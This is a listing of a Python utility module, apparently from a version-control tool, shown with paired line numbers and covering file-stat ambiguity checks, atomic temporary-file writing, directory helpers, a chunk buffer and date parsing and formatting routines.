1567 def __init__(self, stat):
1566 def __init__(self, stat):
1568 self.stat = stat
1567 self.stat = stat
1569
1568
1570 @classmethod
1569 @classmethod
1571 def frompath(cls, path):
1570 def frompath(cls, path):
1572 try:
1571 try:
1573 stat = os.stat(path)
1572 stat = os.stat(path)
1574 except OSError as err:
1573 except OSError as err:
1575 if err.errno != errno.ENOENT:
1574 if err.errno != errno.ENOENT:
1576 raise
1575 raise
1577 stat = None
1576 stat = None
1578 return cls(stat)
1577 return cls(stat)
1579
1578
1580 @classmethod
1579 @classmethod
1581 def fromfp(cls, fp):
1580 def fromfp(cls, fp):
1582 stat = os.fstat(fp.fileno())
1581 stat = os.fstat(fp.fileno())
1583 return cls(stat)
1582 return cls(stat)
1584
1583
1585 __hash__ = object.__hash__
1584 __hash__ = object.__hash__
1586
1585
1587 def __eq__(self, old):
1586 def __eq__(self, old):
1588 try:
1587 try:
1589 # if ambiguity between stat of new and old file is
1588 # if ambiguity between stat of new and old file is
1590 # avoided, comparison of size, ctime and mtime is enough
1589 # avoided, comparison of size, ctime and mtime is enough
1591 # to exactly detect change of a file regardless of platform
1590 # to exactly detect change of a file regardless of platform
1592 return (self.stat.st_size == old.stat.st_size and
1591 return (self.stat.st_size == old.stat.st_size and
1593 self.stat.st_ctime == old.stat.st_ctime and
1592 self.stat.st_ctime == old.stat.st_ctime and
1594 self.stat.st_mtime == old.stat.st_mtime)
1593 self.stat.st_mtime == old.stat.st_mtime)
1595 except AttributeError:
1594 except AttributeError:
1596 pass
1595 pass
1597 try:
1596 try:
1598 return self.stat is None and old.stat is None
1597 return self.stat is None and old.stat is None
1599 except AttributeError:
1598 except AttributeError:
1600 return False
1599 return False
1601
1600
1602 def isambig(self, old):
1601 def isambig(self, old):
1603 """Examine whether new (= self) stat is ambiguous against old one
1602 """Examine whether new (= self) stat is ambiguous against old one
1604
1603
1605 "S[N]" below means stat of a file at N-th change:
1604 "S[N]" below means stat of a file at N-th change:
1606
1605
1607 - S[n-1].ctime < S[n].ctime: can detect change of a file
1606 - S[n-1].ctime < S[n].ctime: can detect change of a file
1608 - S[n-1].ctime == S[n].ctime
1607 - S[n-1].ctime == S[n].ctime
1609 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1608 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1610 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1609 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1611 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1610 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1612 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1611 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1613
1612
1614 Case (*2) above means that a file was changed twice or more at
1613 Case (*2) above means that a file was changed twice or more at
1615 same time in sec (= S[n-1].ctime), and comparison of timestamp
1614 same time in sec (= S[n-1].ctime), and comparison of timestamp
1616 is ambiguous.
1615 is ambiguous.
1617
1616
1618 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1617 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1619 timestamp is ambiguous".
1618 timestamp is ambiguous".
1620
1619
1621 But advancing mtime only in case (*2) doesn't work as
1620 But advancing mtime only in case (*2) doesn't work as
1622 expected, because naturally advanced S[n].mtime in case (*1)
1621 expected, because naturally advanced S[n].mtime in case (*1)
1623 might be equal to manually advanced S[n-1 or earlier].mtime.
1622 might be equal to manually advanced S[n-1 or earlier].mtime.
1624
1623
1625 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1624 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1626 treated as ambiguous regardless of mtime, to avoid overlooking
1625 treated as ambiguous regardless of mtime, to avoid overlooking
1627 by confliction between such mtime.
1626 by confliction between such mtime.
1628
1627
1629 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1628 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1630 S[n].mtime", even if size of a file isn't changed.
1629 S[n].mtime", even if size of a file isn't changed.
1631 """
1630 """
1632 try:
1631 try:
1633 return (self.stat.st_ctime == old.stat.st_ctime)
1632 return (self.stat.st_ctime == old.stat.st_ctime)
1634 except AttributeError:
1633 except AttributeError:
1635 return False
1634 return False
1636
1635
1637 def avoidambig(self, path, old):
1636 def avoidambig(self, path, old):
1638 """Change file stat of specified path to avoid ambiguity
1637 """Change file stat of specified path to avoid ambiguity
1639
1638
1640 'old' should be previous filestat of 'path'.
1639 'old' should be previous filestat of 'path'.
1641
1640
1642 This skips avoiding ambiguity, if a process doesn't have
1641 This skips avoiding ambiguity, if a process doesn't have
1643 appropriate privileges for 'path'. This returns False in this
1642 appropriate privileges for 'path'. This returns False in this
1644 case.
1643 case.
1645
1644
1646 Otherwise, this returns True, as "ambiguity is avoided".
1645 Otherwise, this returns True, as "ambiguity is avoided".
1647 """
1646 """
1648 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1647 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1649 try:
1648 try:
1650 os.utime(path, (advanced, advanced))
1649 os.utime(path, (advanced, advanced))
1651 except OSError as inst:
1650 except OSError as inst:
1652 if inst.errno == errno.EPERM:
1651 if inst.errno == errno.EPERM:
1653 # utime() on the file created by another user causes EPERM,
1652 # utime() on the file created by another user causes EPERM,
1654 # if a process doesn't have appropriate privileges
1653 # if a process doesn't have appropriate privileges
1655 return False
1654 return False
1656 raise
1655 raise
1657 return True
1656 return True
1658
1657
1659 def __ne__(self, other):
1658 def __ne__(self, other):
1660 return not self == other
1659 return not self == other
1661
1660
1662 class atomictempfile(object):
1661 class atomictempfile(object):
1663 '''writable file object that atomically updates a file
1662 '''writable file object that atomically updates a file
1664
1663
1665 All writes will go to a temporary copy of the original file. Call
1664 All writes will go to a temporary copy of the original file. Call
1666 close() when you are done writing, and atomictempfile will rename
1665 close() when you are done writing, and atomictempfile will rename
1667 the temporary copy to the original name, making the changes
1666 the temporary copy to the original name, making the changes
1668 visible. If the object is destroyed without being closed, all your
1667 visible. If the object is destroyed without being closed, all your
1669 writes are discarded.
1668 writes are discarded.
1670
1669
1671 checkambig argument of constructor is used with filestat, and is
1670 checkambig argument of constructor is used with filestat, and is
1672 useful only if target file is guarded by any lock (e.g. repo.lock
1671 useful only if target file is guarded by any lock (e.g. repo.lock
1673 or repo.wlock).
1672 or repo.wlock).
1674 '''
1673 '''
1675 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1674 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1676 self.__name = name # permanent name
1675 self.__name = name # permanent name
1677 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1676 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1678 createmode=createmode)
1677 createmode=createmode)
1679 self._fp = posixfile(self._tempname, mode)
1678 self._fp = posixfile(self._tempname, mode)
1680 self._checkambig = checkambig
1679 self._checkambig = checkambig
1681
1680
1682 # delegated methods
1681 # delegated methods
1683 self.read = self._fp.read
1682 self.read = self._fp.read
1684 self.write = self._fp.write
1683 self.write = self._fp.write
1685 self.seek = self._fp.seek
1684 self.seek = self._fp.seek
1686 self.tell = self._fp.tell
1685 self.tell = self._fp.tell
1687 self.fileno = self._fp.fileno
1686 self.fileno = self._fp.fileno
1688
1687
1689 def close(self):
1688 def close(self):
1690 if not self._fp.closed:
1689 if not self._fp.closed:
1691 self._fp.close()
1690 self._fp.close()
1692 filename = localpath(self.__name)
1691 filename = localpath(self.__name)
1693 oldstat = self._checkambig and filestat.frompath(filename)
1692 oldstat = self._checkambig and filestat.frompath(filename)
1694 if oldstat and oldstat.stat:
1693 if oldstat and oldstat.stat:
1695 rename(self._tempname, filename)
1694 rename(self._tempname, filename)
1696 newstat = filestat.frompath(filename)
1695 newstat = filestat.frompath(filename)
1697 if newstat.isambig(oldstat):
1696 if newstat.isambig(oldstat):
1698 # stat of changed file is ambiguous to original one
1697 # stat of changed file is ambiguous to original one
1699 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1698 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1700 os.utime(filename, (advanced, advanced))
1699 os.utime(filename, (advanced, advanced))
1701 else:
1700 else:
1702 rename(self._tempname, filename)
1701 rename(self._tempname, filename)
1703
1702
1704 def discard(self):
1703 def discard(self):
1705 if not self._fp.closed:
1704 if not self._fp.closed:
1706 try:
1705 try:
1707 os.unlink(self._tempname)
1706 os.unlink(self._tempname)
1708 except OSError:
1707 except OSError:
1709 pass
1708 pass
1710 self._fp.close()
1709 self._fp.close()
1711
1710
1712 def __del__(self):
1711 def __del__(self):
1713 if safehasattr(self, '_fp'): # constructor actually did something
1712 if safehasattr(self, '_fp'): # constructor actually did something
1714 self.discard()
1713 self.discard()
1715
1714
1716 def __enter__(self):
1715 def __enter__(self):
1717 return self
1716 return self
1718
1717
1719 def __exit__(self, exctype, excvalue, traceback):
1718 def __exit__(self, exctype, excvalue, traceback):
1720 if exctype is not None:
1719 if exctype is not None:
1721 self.discard()
1720 self.discard()
1722 else:
1721 else:
1723 self.close()
1722 self.close()
1724
1723
1725 def unlinkpath(f, ignoremissing=False):
1724 def unlinkpath(f, ignoremissing=False):
1726 """unlink and remove the directory if it is empty"""
1725 """unlink and remove the directory if it is empty"""
1727 if ignoremissing:
1726 if ignoremissing:
1728 tryunlink(f)
1727 tryunlink(f)
1729 else:
1728 else:
1730 unlink(f)
1729 unlink(f)
1731 # try removing directories that might now be empty
1730 # try removing directories that might now be empty
1732 try:
1731 try:
1733 removedirs(os.path.dirname(f))
1732 removedirs(os.path.dirname(f))
1734 except OSError:
1733 except OSError:
1735 pass
1734 pass
1736
1735
1737 def tryunlink(f):
1736 def tryunlink(f):
1738 """Attempt to remove a file, ignoring ENOENT errors."""
1737 """Attempt to remove a file, ignoring ENOENT errors."""
1739 try:
1738 try:
1740 unlink(f)
1739 unlink(f)
1741 except OSError as e:
1740 except OSError as e:
1742 if e.errno != errno.ENOENT:
1741 if e.errno != errno.ENOENT:
1743 raise
1742 raise
1744
1743
1745 def makedirs(name, mode=None, notindexed=False):
1744 def makedirs(name, mode=None, notindexed=False):
1746 """recursive directory creation with parent mode inheritance
1745 """recursive directory creation with parent mode inheritance
1747
1746
1748 Newly created directories are marked as "not to be indexed by
1747 Newly created directories are marked as "not to be indexed by
1749 the content indexing service", if ``notindexed`` is specified
1748 the content indexing service", if ``notindexed`` is specified
1750 for "write" mode access.
1749 for "write" mode access.
1751 """
1750 """
1752 try:
1751 try:
1753 makedir(name, notindexed)
1752 makedir(name, notindexed)
1754 except OSError as err:
1753 except OSError as err:
1755 if err.errno == errno.EEXIST:
1754 if err.errno == errno.EEXIST:
1756 return
1755 return
1757 if err.errno != errno.ENOENT or not name:
1756 if err.errno != errno.ENOENT or not name:
1758 raise
1757 raise
1759 parent = os.path.dirname(os.path.abspath(name))
1758 parent = os.path.dirname(os.path.abspath(name))
1760 if parent == name:
1759 if parent == name:
1761 raise
1760 raise
1762 makedirs(parent, mode, notindexed)
1761 makedirs(parent, mode, notindexed)
1763 try:
1762 try:
1764 makedir(name, notindexed)
1763 makedir(name, notindexed)
1765 except OSError as err:
1764 except OSError as err:
1766 # Catch EEXIST to handle races
1765 # Catch EEXIST to handle races
1767 if err.errno == errno.EEXIST:
1766 if err.errno == errno.EEXIST:
1768 return
1767 return
1769 raise
1768 raise
1770 if mode is not None:
1769 if mode is not None:
1771 os.chmod(name, mode)
1770 os.chmod(name, mode)
1772
1771
1773 def readfile(path):
1772 def readfile(path):
1774 with open(path, 'rb') as fp:
1773 with open(path, 'rb') as fp:
1775 return fp.read()
1774 return fp.read()
1776
1775
1777 def writefile(path, text):
1776 def writefile(path, text):
1778 with open(path, 'wb') as fp:
1777 with open(path, 'wb') as fp:
1779 fp.write(text)
1778 fp.write(text)
1780
1779
1781 def appendfile(path, text):
1780 def appendfile(path, text):
1782 with open(path, 'ab') as fp:
1781 with open(path, 'ab') as fp:
1783 fp.write(text)
1782 fp.write(text)
1784
1783
1785 class chunkbuffer(object):
1784 class chunkbuffer(object):
1786 """Allow arbitrary sized chunks of data to be efficiently read from an
1785 """Allow arbitrary sized chunks of data to be efficiently read from an
1787 iterator over chunks of arbitrary size."""
1786 iterator over chunks of arbitrary size."""
1788
1787
1789 def __init__(self, in_iter):
1788 def __init__(self, in_iter):
1790 """in_iter is the iterator that's iterating over the input chunks."""
1789 """in_iter is the iterator that's iterating over the input chunks."""
1791 def splitbig(chunks):
1790 def splitbig(chunks):
1792 for chunk in chunks:
1791 for chunk in chunks:
1793 if len(chunk) > 2**20:
1792 if len(chunk) > 2**20:
1794 pos = 0
1793 pos = 0
1795 while pos < len(chunk):
1794 while pos < len(chunk):
1796 end = pos + 2 ** 18
1795 end = pos + 2 ** 18
1797 yield chunk[pos:end]
1796 yield chunk[pos:end]
1798 pos = end
1797 pos = end
1799 else:
1798 else:
1800 yield chunk
1799 yield chunk
1801 self.iter = splitbig(in_iter)
1800 self.iter = splitbig(in_iter)
1802 self._queue = collections.deque()
1801 self._queue = collections.deque()
1803 self._chunkoffset = 0
1802 self._chunkoffset = 0
1804
1803
1805 def read(self, l=None):
1804 def read(self, l=None):
1806 """Read L bytes of data from the iterator of chunks of data.
1805 """Read L bytes of data from the iterator of chunks of data.
1807 Returns less than L bytes if the iterator runs dry.
1806 Returns less than L bytes if the iterator runs dry.
1808
1807
1809 If size parameter is omitted, read everything"""
1808 If size parameter is omitted, read everything"""
1810 if l is None:
1809 if l is None:
1811 return ''.join(self.iter)
1810 return ''.join(self.iter)
1812
1811
1813 left = l
1812 left = l
1814 buf = []
1813 buf = []
1815 queue = self._queue
1814 queue = self._queue
1816 while left > 0:
1815 while left > 0:
1817 # refill the queue
1816 # refill the queue
1818 if not queue:
1817 if not queue:
1819 target = 2**18
1818 target = 2**18
1820 for chunk in self.iter:
1819 for chunk in self.iter:
1821 queue.append(chunk)
1820 queue.append(chunk)
1822 target -= len(chunk)
1821 target -= len(chunk)
1823 if target <= 0:
1822 if target <= 0:
1824 break
1823 break
1825 if not queue:
1824 if not queue:
1826 break
1825 break
1827
1826
1828 # The easy way to do this would be to queue.popleft(), modify the
1827 # The easy way to do this would be to queue.popleft(), modify the
1829 # chunk (if necessary), then queue.appendleft(). However, for cases
1828 # chunk (if necessary), then queue.appendleft(). However, for cases
1830 # where we read partial chunk content, this incurs 2 dequeue
1829 # where we read partial chunk content, this incurs 2 dequeue
1831 # mutations and creates a new str for the remaining chunk in the
1830 # mutations and creates a new str for the remaining chunk in the
1832 # queue. Our code below avoids this overhead.
1831 # queue. Our code below avoids this overhead.
1833
1832
1834 chunk = queue[0]
1833 chunk = queue[0]
1835 chunkl = len(chunk)
1834 chunkl = len(chunk)
1836 offset = self._chunkoffset
1835 offset = self._chunkoffset
1837
1836
1838 # Use full chunk.
1837 # Use full chunk.
1839 if offset == 0 and left >= chunkl:
1838 if offset == 0 and left >= chunkl:
1840 left -= chunkl
1839 left -= chunkl
1841 queue.popleft()
1840 queue.popleft()
1842 buf.append(chunk)
1841 buf.append(chunk)
1843 # self._chunkoffset remains at 0.
1842 # self._chunkoffset remains at 0.
1844 continue
1843 continue
1845
1844
1846 chunkremaining = chunkl - offset
1845 chunkremaining = chunkl - offset
1847
1846
1848 # Use all of unconsumed part of chunk.
1847 # Use all of unconsumed part of chunk.
1849 if left >= chunkremaining:
1848 if left >= chunkremaining:
1850 left -= chunkremaining
1849 left -= chunkremaining
1851 queue.popleft()
1850 queue.popleft()
1852 # offset == 0 is enabled by block above, so this won't merely
1851 # offset == 0 is enabled by block above, so this won't merely
1853 # copy via ``chunk[0:]``.
1852 # copy via ``chunk[0:]``.
1854 buf.append(chunk[offset:])
1853 buf.append(chunk[offset:])
1855 self._chunkoffset = 0
1854 self._chunkoffset = 0
1856
1855
1857 # Partial chunk needed.
1856 # Partial chunk needed.
1858 else:
1857 else:
1859 buf.append(chunk[offset:offset + left])
1858 buf.append(chunk[offset:offset + left])
1860 self._chunkoffset += left
1859 self._chunkoffset += left
1861 left -= chunkremaining
1860 left -= chunkremaining
1862
1861
1863 return ''.join(buf)
1862 return ''.join(buf)
1864
1863
1865 def filechunkiter(f, size=131072, limit=None):
1864 def filechunkiter(f, size=131072, limit=None):
1866 """Create a generator that produces the data in the file size
1865 """Create a generator that produces the data in the file size
1867 (default 131072) bytes at a time, up to optional limit (default is
1866 (default 131072) bytes at a time, up to optional limit (default is
1868 to read all data). Chunks may be less than size bytes if the
1867 to read all data). Chunks may be less than size bytes if the
1869 chunk is the last chunk in the file, or the file is a socket or
1868 chunk is the last chunk in the file, or the file is a socket or
1870 some other type of file that sometimes reads less data than is
1869 some other type of file that sometimes reads less data than is
1871 requested."""
1870 requested."""
1872 assert size >= 0
1871 assert size >= 0
1873 assert limit is None or limit >= 0
1872 assert limit is None or limit >= 0
1874 while True:
1873 while True:
1875 if limit is None:
1874 if limit is None:
1876 nbytes = size
1875 nbytes = size
1877 else:
1876 else:
1878 nbytes = min(limit, size)
1877 nbytes = min(limit, size)
1879 s = nbytes and f.read(nbytes)
1878 s = nbytes and f.read(nbytes)
1880 if not s:
1879 if not s:
1881 break
1880 break
1882 if limit:
1881 if limit:
1883 limit -= len(s)
1882 limit -= len(s)
1884 yield s
1883 yield s
1885
1884
1886 def makedate(timestamp=None):
1885 def makedate(timestamp=None):
1887 '''Return a unix timestamp (or the current time) as a (unixtime,
1886 '''Return a unix timestamp (or the current time) as a (unixtime,
1888 offset) tuple based off the local timezone.'''
1887 offset) tuple based off the local timezone.'''
1889 if timestamp is None:
1888 if timestamp is None:
1890 timestamp = time.time()
1889 timestamp = time.time()
1891 if timestamp < 0:
1890 if timestamp < 0:
1892 hint = _("check your clock")
1891 hint = _("check your clock")
1893 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1892 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1894 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1893 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1895 datetime.datetime.fromtimestamp(timestamp))
1894 datetime.datetime.fromtimestamp(timestamp))
1896 tz = delta.days * 86400 + delta.seconds
1895 tz = delta.days * 86400 + delta.seconds
1897 return timestamp, tz
1896 return timestamp, tz
1898
1897
1899 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1898 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1900 """represent a (unixtime, offset) tuple as a localized time.
1899 """represent a (unixtime, offset) tuple as a localized time.
1901 unixtime is seconds since the epoch, and offset is the time zone's
1900 unixtime is seconds since the epoch, and offset is the time zone's
1902 number of seconds away from UTC.
1901 number of seconds away from UTC.
1903
1902
1904 >>> datestr((0, 0))
1903 >>> datestr((0, 0))
1905 'Thu Jan 01 00:00:00 1970 +0000'
1904 'Thu Jan 01 00:00:00 1970 +0000'
1906 >>> datestr((42, 0))
1905 >>> datestr((42, 0))
1907 'Thu Jan 01 00:00:42 1970 +0000'
1906 'Thu Jan 01 00:00:42 1970 +0000'
1908 >>> datestr((-42, 0))
1907 >>> datestr((-42, 0))
1909 'Wed Dec 31 23:59:18 1969 +0000'
1908 'Wed Dec 31 23:59:18 1969 +0000'
1910 >>> datestr((0x7fffffff, 0))
1909 >>> datestr((0x7fffffff, 0))
1911 'Tue Jan 19 03:14:07 2038 +0000'
1910 'Tue Jan 19 03:14:07 2038 +0000'
1912 >>> datestr((-0x80000000, 0))
1911 >>> datestr((-0x80000000, 0))
1913 'Fri Dec 13 20:45:52 1901 +0000'
1912 'Fri Dec 13 20:45:52 1901 +0000'
1914 """
1913 """
1915 t, tz = date or makedate()
1914 t, tz = date or makedate()
1916 if "%1" in format or "%2" in format or "%z" in format:
1915 if "%1" in format or "%2" in format or "%z" in format:
1917 sign = (tz > 0) and "-" or "+"
1916 sign = (tz > 0) and "-" or "+"
1918 minutes = abs(tz) // 60
1917 minutes = abs(tz) // 60
1919 q, r = divmod(minutes, 60)
1918 q, r = divmod(minutes, 60)
1920 format = format.replace("%z", "%1%2")
1919 format = format.replace("%z", "%1%2")
1921 format = format.replace("%1", "%c%02d" % (sign, q))
1920 format = format.replace("%1", "%c%02d" % (sign, q))
1922 format = format.replace("%2", "%02d" % r)
1921 format = format.replace("%2", "%02d" % r)
1923 d = t - tz
1922 d = t - tz
1924 if d > 0x7fffffff:
1923 if d > 0x7fffffff:
1925 d = 0x7fffffff
1924 d = 0x7fffffff
1926 elif d < -0x80000000:
1925 elif d < -0x80000000:
1927 d = -0x80000000
1926 d = -0x80000000
1928 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1927 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1929 # because they use the gmtime() system call which is buggy on Windows
1928 # because they use the gmtime() system call which is buggy on Windows
1930 # for negative values.
1929 # for negative values.
1931 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1930 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1932 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1931 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1933 return s
1932 return s
1934
1933
1935 def shortdate(date=None):
1934 def shortdate(date=None):
1936 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1935 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1937 return datestr(date, format='%Y-%m-%d')
1936 return datestr(date, format='%Y-%m-%d')
1938
1937
1939 def parsetimezone(s):
1938 def parsetimezone(s):
1940 """find a trailing timezone, if any, in string, and return a
1939 """find a trailing timezone, if any, in string, and return a
1941 (offset, remainder) pair"""
1940 (offset, remainder) pair"""
1942
1941
1943 if s.endswith("GMT") or s.endswith("UTC"):
1942 if s.endswith("GMT") or s.endswith("UTC"):
1944 return 0, s[:-3].rstrip()
1943 return 0, s[:-3].rstrip()
1945
1944
1946 # Unix-style timezones [+-]hhmm
1945 # Unix-style timezones [+-]hhmm
1947 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1946 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1948 sign = (s[-5] == "+") and 1 or -1
1947 sign = (s[-5] == "+") and 1 or -1
1949 hours = int(s[-4:-2])
1948 hours = int(s[-4:-2])
1950 minutes = int(s[-2:])
1949 minutes = int(s[-2:])
1951 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1950 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1952
1951
1953 # ISO8601 trailing Z
1952 # ISO8601 trailing Z
1954 if s.endswith("Z") and s[-2:-1].isdigit():
1953 if s.endswith("Z") and s[-2:-1].isdigit():
1955 return 0, s[:-1]
1954 return 0, s[:-1]
1956
1955
1957 # ISO8601-style [+-]hh:mm
1956 # ISO8601-style [+-]hh:mm
1958 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1957 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1959 s[-5:-3].isdigit() and s[-2:].isdigit()):
1958 s[-5:-3].isdigit() and s[-2:].isdigit()):
1960 sign = (s[-6] == "+") and 1 or -1
1959 sign = (s[-6] == "+") and 1 or -1
1961 hours = int(s[-5:-3])
1960 hours = int(s[-5:-3])
1962 minutes = int(s[-2:])
1961 minutes = int(s[-2:])
1963 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1962 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1964
1963
1965 return None, s
1964 return None, s
1966
1965
1967 def strdate(string, format, defaults=None):
1966 def strdate(string, format, defaults=None):
1968 """parse a localized time string and return a (unixtime, offset) tuple.
1967 """parse a localized time string and return a (unixtime, offset) tuple.
1969 if the string cannot be parsed, ValueError is raised."""
1968 if the string cannot be parsed, ValueError is raised."""
1970 if defaults is None:
1969 if defaults is None:
1971 defaults = {}
1970 defaults = {}
1972
1971
1973 # NOTE: unixtime = localunixtime + offset
1972 # NOTE: unixtime = localunixtime + offset
1974 offset, date = parsetimezone(string)
1973 offset, date = parsetimezone(string)
1975
1974
1976 # add missing elements from defaults
1975 # add missing elements from defaults
1977 usenow = False # default to using biased defaults
1976 usenow = False # default to using biased defaults
1978 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1977 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1979 part = pycompat.bytestr(part)
1978 part = pycompat.bytestr(part)
1980 found = [True for p in part if ("%"+p) in format]
1979 found = [True for p in part if ("%"+p) in format]
1981 if not found:
1980 if not found:
1982 date += "@" + defaults[part][usenow]
1981 date += "@" + defaults[part][usenow]
1983 format += "@%" + part[0]
1982 format += "@%" + part[0]
1984 else:
1983 else:
1985 # We've found a specific time element, less specific time
1984 # We've found a specific time element, less specific time
1986 # elements are relative to today
1985 # elements are relative to today
1987 usenow = True
1986 usenow = True
1988
1987
1989 timetuple = time.strptime(encoding.strfromlocal(date),
1988 timetuple = time.strptime(encoding.strfromlocal(date),
1990 encoding.strfromlocal(format))
1989 encoding.strfromlocal(format))
1991 localunixtime = int(calendar.timegm(timetuple))
1990 localunixtime = int(calendar.timegm(timetuple))
1992 if offset is None:
1991 if offset is None:
1993 # local timezone
1992 # local timezone
1994 unixtime = int(time.mktime(timetuple))
1993 unixtime = int(time.mktime(timetuple))
1995 offset = unixtime - localunixtime
1994 offset = unixtime - localunixtime
1996 else:
1995 else:
1997 unixtime = localunixtime + offset
1996 unixtime = localunixtime + offset
1998 return unixtime, offset
1997 return unixtime, offset
1999
1998
2000 def parsedate(date, formats=None, bias=None):
1999 def parsedate(date, formats=None, bias=None):
2001 """parse a localized date/time and return a (unixtime, offset) tuple.
2000 """parse a localized date/time and return a (unixtime, offset) tuple.
2002
2001
2003 The date may be a "unixtime offset" string or in one of the specified
2002 The date may be a "unixtime offset" string or in one of the specified
2004 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2003 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2005
2004
2006 >>> parsedate(' today ') == parsedate(\
2005 >>> parsedate(' today ') == parsedate(\
2007 datetime.date.today().strftime('%b %d'))
2006 datetime.date.today().strftime('%b %d'))
2008 True
2007 True
2009 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
2008 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
2010 datetime.timedelta(days=1)\
2009 datetime.timedelta(days=1)\
2011 ).strftime('%b %d'))
2010 ).strftime('%b %d'))
2012 True
2011 True
2013 >>> now, tz = makedate()
2012 >>> now, tz = makedate()
2014 >>> strnow, strtz = parsedate('now')
2013 >>> strnow, strtz = parsedate('now')
2015 >>> (strnow - now) < 1
2014 >>> (strnow - now) < 1
2016 True
2015 True
2017 >>> tz == strtz
2016 >>> tz == strtz
2018 True
2017 True
2019 """
2018 """
2020 if bias is None:
2019 if bias is None:
2021 bias = {}
2020 bias = {}
2022 if not date:
2021 if not date:
2023 return 0, 0
2022 return 0, 0
2024 if isinstance(date, tuple) and len(date) == 2:
2023 if isinstance(date, tuple) and len(date) == 2:
2025 return date
2024 return date
2026 if not formats:
2025 if not formats:
2027 formats = defaultdateformats
2026 formats = defaultdateformats
2028 date = date.strip()
2027 date = date.strip()
2029
2028
2030 if date == 'now' or date == _('now'):
2029 if date == 'now' or date == _('now'):
2031 return makedate()
2030 return makedate()
2032 if date == 'today' or date == _('today'):
2031 if date == 'today' or date == _('today'):
2033 date = datetime.date.today().strftime('%b %d')
2032 date = datetime.date.today().strftime('%b %d')
2034 elif date == 'yesterday' or date == _('yesterday'):
2033 elif date == 'yesterday' or date == _('yesterday'):
2035 date = (datetime.date.today() -
2034 date = (datetime.date.today() -
2036 datetime.timedelta(days=1)).strftime('%b %d')
2035 datetime.timedelta(days=1)).strftime('%b %d')
2037
2036
2038 try:
2037 try:
2039 when, offset = map(int, date.split(' '))
2038 when, offset = map(int, date.split(' '))
2040 except ValueError:
2039 except ValueError:
2041 # fill out defaults
2040 # fill out defaults
2042 now = makedate()
2041 now = makedate()
2043 defaults = {}
2042 defaults = {}
2044 for part in ("d", "mb", "yY", "HI", "M", "S"):
2043 for part in ("d", "mb", "yY", "HI", "M", "S"):
2045 # this piece is for rounding the specific end of unknowns
2044 # this piece is for rounding the specific end of unknowns
2046 b = bias.get(part)
2045 b = bias.get(part)
2047 if b is None:
2046 if b is None:
2048 if part[0:1] in "HMS":
2047 if part[0:1] in "HMS":
2049 b = "00"
2048 b = "00"
2050 else:
2049 else:
2051 b = "0"
2050 b = "0"
2052
2051
2053 # this piece is for matching the generic end to today's date
2052 # this piece is for matching the generic end to today's date
2054 n = datestr(now, "%" + part[0:1])
2053 n = datestr(now, "%" + part[0:1])
2055
2054
2056 defaults[part] = (b, n)
2055 defaults[part] = (b, n)
2057
2056
2058 for format in formats:
2057 for format in formats:
2059 try:
2058 try:
2060 when, offset = strdate(date, format, defaults)
2059 when, offset = strdate(date, format, defaults)
2061 except (ValueError, OverflowError):
2060 except (ValueError, OverflowError):
2062 pass
2061 pass
2063 else:
2062 else:
2064 break
2063 break
2065 else:
2064 else:
2066 raise error.ParseError(_('invalid date: %r') % date)
2065 raise error.ParseError(_('invalid date: %r') % date)
2067 # validate explicit (probably user-specified) date and
2066 # validate explicit (probably user-specified) date and
2068 # time zone offset. values must fit in signed 32 bits for
2067 # time zone offset. values must fit in signed 32 bits for
2069 # current 32-bit linux runtimes. timezones go from UTC-12
2068 # current 32-bit linux runtimes. timezones go from UTC-12
2070 # to UTC+14
2069 # to UTC+14
2071 if when < -0x80000000 or when > 0x7fffffff:
2070 if when < -0x80000000 or when > 0x7fffffff:
2072 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2071 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
